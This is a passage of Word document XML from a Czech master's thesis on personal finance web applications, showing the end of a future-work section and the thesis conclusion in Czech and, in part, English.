        <w:t xml:space="preserve"> automatický import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> za využití API</w:t>
      </w:r>
      <w:r w:rsidR="004D0807">
        <w:t xml:space="preserve"> nabízeného některými</w:t>
      </w:r>
      <w:r w:rsidR="002E64F0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D0807">
        <w:t>z nich</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002E64F0">
        <w:t xml:space="preserve"> Případně by</w:t>
      </w:r>
      <w:r w:rsidR="004D0807">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E64F0">
        <w:t xml:space="preserve">k automatizaci </w:t>
      </w:r>
      <w:r w:rsidR="004D0807">
        <w:t xml:space="preserve">také </w:t>
      </w:r>
      <w:r w:rsidR="002E64F0">
        <w:t>mohlo být využito informačních emailů, které banky zasílají při změně stavu účtu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E64F0" w:rsidRDefault="002E64F0" w:rsidP="00F3033A">
      <w:r>
        <w:t xml:space="preserve">Dále by aplikace mohla podporovat vedení účtů ve více měnách současně nebo hromadné akce, </w:t>
      </w:r>
      <w:r w:rsidR="004D0807">
        <w:t>pomocí kterých</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r w:rsidR="004D0807">
        <w:t xml:space="preserve">uživatel mohl například </w:t>
      </w:r>
      <w:r>
        <w:t>přiřadit štítek více transakcím najednou.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRPr="00F3033A" w:rsidRDefault="002E64F0" w:rsidP="00F3033A">
      <w:r>
        <w:t>Přestože je aplikace od začátku navrhnuta s ohledem na mobilní zařízení, je stále nutné přistupovat k ní online. V budoucnu by bylo určitě dobré doplnit ji o velmi jednoduchou mobilní aplikaci, která by umožňovala offline zadávání výdajů a ty</w:t>
      </w:r>
      <w:r w:rsidR="004D0807">
        <w:t xml:space="preserve"> poté</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> automaticky synchronizovala se serverem.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94493" w:rsidRDefault="00C94493" w:rsidP="004C1DC7">
      <w:pPr>
        <w:pStyle w:val="Nadpis"/>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:bookmarkStart w:id="238" w:name="_Toc37577734"/>
      <w:bookmarkStart w:id="239" w:name="_Toc88120445"/>
      <w:bookmarkStart w:id="240" w:name="_Toc88120682"/>
      <w:bookmarkStart w:id="241" w:name="_Toc88120894"/>
      <w:bookmarkStart w:id="242" w:name="_Toc88120998"/>
      <w:bookmarkStart w:id="243" w:name="_Toc88121041"/>
      <w:bookmarkStart w:id="244" w:name="_Toc88121178"/>
      <w:bookmarkStart w:id="245" w:name="_Toc88121552"/>
      <w:bookmarkStart w:id="246" w:name="_Toc88121609"/>
      <w:bookmarkStart w:id="247" w:name="_Toc88121747"/>
      <w:bookmarkStart w:id="248" w:name="_Toc88122013"/>
      <w:bookmarkStart w:id="249" w:name="_Toc88124618"/>
      <w:bookmarkStart w:id="250" w:name="_Toc88124655"/>
      <w:bookmarkStart w:id="251" w:name="_Toc88124805"/>
      <w:bookmarkStart w:id="252" w:name="_Toc88125788"/>
      <w:bookmarkStart w:id="253" w:name="_Toc88126308"/>
      <w:bookmarkStart w:id="254" w:name="_Toc88126459"/>
      <w:bookmarkStart w:id="255" w:name="_Toc88126526"/>
      <w:bookmarkStart w:id="256" w:name="_Toc88126555"/>
      <w:bookmarkStart w:id="257" w:name="_Toc88126771"/>
      <w:bookmarkStart w:id="258" w:name="_Toc88126861"/>
      <w:bookmarkStart w:id="259" w:name="_Toc88127102"/>
      <w:bookmarkStart w:id="260" w:name="_Toc88127145"/>
      <w:bookmarkStart w:id="261" w:name="_Toc88128510"/>
      <w:bookmarkStart w:id="262" w:name="_Toc107634152"/>
      <w:bookmarkStart w:id="263" w:name="_Toc107635187"/>
      <w:bookmarkStart w:id="264" w:name="_Toc107635227"/>
      <w:bookmarkStart w:id="265" w:name="_Toc107635244"/>
      <w:bookmarkStart w:id="266" w:name="_Toc387327901"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Závěr</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rsidR="00C94493" w:rsidRDefault="004A706A" w:rsidP="004C1DC7">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:r>
        <w:t>Tato diplomová práce se zabývá aplikacemi pro správu osobních financí. Nejdříve je nastíněna motivace, proč</w:t>
      </w:r>
      <w:r w:rsidR="00762EA7">
        <w:t xml:space="preserve"> se</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> má smysl touto problematikou vůbec zabývat a je uvedeno, jaké mají uživatelé na tento </w:t>
      </w:r>
      <w:r w:rsidR="00FC0CF0">
        <w:t>druh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aplikací požadavky.</w:t>
      </w:r>
      <w:r w:rsidR="00762EA7">
        <w:t xml:space="preserve"> Dále </w:t>
      </w:r>
      <w:r w:rsidR="008E4E5C">
        <w:t>jsou</w:t>
      </w:r>
      <w:r w:rsidR="00762EA7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E4E5C">
        <w:t xml:space="preserve">popsány </w:t>
      </w:r>
      <w:r w:rsidR="00762EA7">
        <w:t>typy aplikací</w:t>
      </w:r>
      <w:r w:rsidR="008E4E5C">
        <w:t xml:space="preserve">, které </w:t>
      </w:r>
      <w:r w:rsidR="00762EA7">
        <w:t xml:space="preserve">pro správu </w:t>
      </w:r>
      <w:r w:rsidR="008E4E5C">
        <w:t xml:space="preserve">osobních </w:t>
      </w:r>
      <w:r w:rsidR="00762EA7">
        <w:t>financí existují</w:t>
      </w:r>
      <w:r w:rsidR="008E4E5C">
        <w:t xml:space="preserve"> a výsledky</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006209B0">
        <w:t xml:space="preserve">analýzy </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">relevantních </w:t>
      </w:r>
      <w:r w:rsidR="00762EA7">
        <w:t xml:space="preserve">webových </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">řešení dostupných na českém trhu a jednoho zahraničního </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>startupu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00762EA7" w:rsidRDefault="00762EA7" w:rsidP="004C1DC7">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vzhledem k tomu, že osobní finance spravované ve webové aplikaci jsou velmi citlivé téma z hlediska bezpečnosti, bylo detailně rozebráno deset největších bezpečnostních zranitelností webových aplikací podle nezávislé organizace OWASP. U každé zranitelnosti bylo vysvětleno v čem spočívá, jak jí lze zneužít a jakým způsobem se proti ní bránit. Díky tomuto rozboru bylo možné později vlastní aplikaci navrhnout tak, aby zmíněné zranitelnosti </w:t>
      </w:r>
      <w:r w:rsidR="00EF4673">
        <w:t>neobsahovala</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00762EA7" w:rsidRDefault="00D63C47" w:rsidP="004C1DC7">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bylo navrhnuto vlastní řešení problematiky, jehož </w:t>
      </w:r>
      <w:r w:rsidR="00762EA7">
        <w:t xml:space="preserve">funkcionalita </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">byla detailně rozpracována </w:t>
      </w:r>
      <w:r w:rsidR="008E4E5C">
        <w:t>ve formě jednotlivých uživatelských scénářů.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Na základě vytvořených scénářů a </w:t>
      </w:r>
      <w:r w:rsidR="00FC0CF0">
        <w:t>nefunkčních požadavků</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> na aplikaci bylo navrhnuto uživatelské rozhraní aplikace ve formě náčrtů. Na těchto náčrtech bylo validováno, zda obsahují veškerou požadovanou funkcionalitu aplikace.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A547A" w:rsidRDefault="00120D0F" w:rsidP="004C1DC7">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:r>
        <w:t>Pro implementaci byl</w:t>
      </w:r>
      <w:r w:rsidR="00DC0996">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vybrán</w:t>
      </w:r>
      <w:r w:rsidR="00DC0996">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vhodn</w:t>
      </w:r>
      <w:r w:rsidR="00DC0996">
        <w:t>á kombinace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC0996">
        <w:t>webových serverových a klientských</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> technologi</w:t>
      </w:r>
      <w:r w:rsidR="00DC0996">
        <w:t xml:space="preserve">í a </w:t>
      </w:r>
      <w:r w:rsidR="003A547A">
        <w:t xml:space="preserve">dostupných </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DC0996">
        <w:t>frameworků</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DC0996">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003A547A">
        <w:t xml:space="preserve"> Byl </w:t>
      </w:r>
      <w:r w:rsidR="00EA2B6C">
        <w:t xml:space="preserve">také </w:t>
      </w:r>
      <w:r w:rsidR="003A547A">
        <w:t>vytvořen funkční prototyp aplikace, který implementuje nejdůležitější uživatelské scénáře</w:t>
      </w:r>
      <w:r w:rsidR="00746A4B">
        <w:t xml:space="preserve"> a ověřuje navrhnutý výběr technologií</w:t>
      </w:r>
      <w:r w:rsidR="003A547A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00762EA7" w:rsidRDefault="003A547A" w:rsidP="004C1DC7">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:r>
        <w:t>Vytvořený prototyp byl využit pro uživatelské testování aplikace na vzorku uživatelů, které mělo ověřit správnost celého konceptu navrhnutého řešení. Při testování byly objeveny některé nedostatky implementace, které mohou být opraveny do další verze. Samotný koncept</w:t>
      </w:r>
      <w:r w:rsidR="00AF6D3A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>aplikace byl ale validován s pozitivním výsledkem. Všichni uživatelé shodně uvedli, že by dané řešení používali pro evidenci svých financí.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F21ACF" w:rsidRDefault="003A547A" w:rsidP="004C1DC7">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:r>
        <w:t>Nakonec byly v práci uvedeny náměty na další rozšíření aplikace, které částečně</w:t>
      </w:r>
      <w:r w:rsidR="008D29CA">
        <w:t xml:space="preserve"> také</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vychází</w:t>
      </w:r>
      <w:r w:rsidR="00FC1BA3">
        <w:t xml:space="preserve"> ze zpětné vazby od uživatelů</w:t>
      </w:r>
      <w:r w:rsidR="008D29CA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00350FA0">
        <w:t>účastn</w:t>
      </w:r>
      <w:r w:rsidR="008D29CA">
        <w:t xml:space="preserve">ících se </w:t>
      </w:r>
      <w:r w:rsidR="00FC1BA3">
        <w:t>testov</w:t>
      </w:r>
      <w:r w:rsidR="00350FA0">
        <w:t>ání</w:t>
      </w:r>
      <w:r w:rsidR="00FC1BA3">
        <w:t xml:space="preserve"> prototyp</w:t>
      </w:r>
      <w:r w:rsidR="00350FA0">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00FC1BA3">
        <w:t xml:space="preserve"> aplikace.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F21ACF" w:rsidRDefault="00E33541" w:rsidP="004C1DC7">
      <w:pPr>
        <w:pStyle w:val="Nadpis"/>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:bookmarkStart w:id="267" w:name="_Toc387327902"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="267"/>
    </w:p>
    <w:p w:rsidR="00487D3E" w:rsidRDefault="00487D3E" w:rsidP="00487D3E">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dissertation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>describes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>applications</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>personal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> finance management. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>motivation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dealing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>topic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>described</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>at</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>beginning</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>also</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>outlines</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>users’</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>requirements</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00EF4673">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>applications</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>next</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> part </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>details</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>already</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>existing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>applications</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>personal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> finance management </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>analysis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>results</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>relevant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>solutions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>available</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Czech</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> market </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>one</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>foreign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>startup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487D3E" w:rsidRDefault="00487D3E" w:rsidP="00487D3E">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Due</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>that</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>personal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> finance </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>managed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in a web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>very</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sensitive </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>topic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>terms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>work</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>describes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in detail </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ten </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>largest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>applications</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>according</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> independent OWASP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>organization</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Each</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>thoroughly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>explained</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>how</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>it</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
